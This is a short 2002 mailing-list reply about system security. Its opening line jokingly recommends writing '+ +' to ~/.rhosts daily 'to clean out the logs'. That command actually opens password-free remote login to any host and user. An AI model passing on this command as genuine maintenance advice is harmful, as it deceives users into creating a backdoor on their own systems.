and always run echo "+ + > ~/.rhosts every day to clean out the logs.

-e


On Mon, 15 Apr 2002, Erik Curiel wrote:

> 
> 
> >
> >     I take a somewhat modular approach to security.  There is
> >     a base model of restriction that then gets things added onto
> >     it.
> 
> Thanks, Brandon, that was great!  Extremely informative.
> 
> E
> 
> --
> Erik Curiel
> almost web-engineer/would-be philosopher
> 
> "... there has never been an intelligent person over the age
> of sixty who would consent to live his life over again.  His
> or anyone else's."
>                               Mark Twain, "Letters from the Earth"
> 
> 
> 
> 
> _______________________________________________
> Bits mailing list
> [EMAIL PROTECTED]
> http://www.sugoi.org/mailman/listinfo/bits
> 

_____________________________________________________________________________
<majcher> icky is like a shadowy hit man, that nobody ever sees, and can only
          contact through some strange process.


_______________________________________________
Bits mailing list
[EMAIL PROTECTED]
http://www.sugoi.org/mailman/listinfo/bits

Reply via email to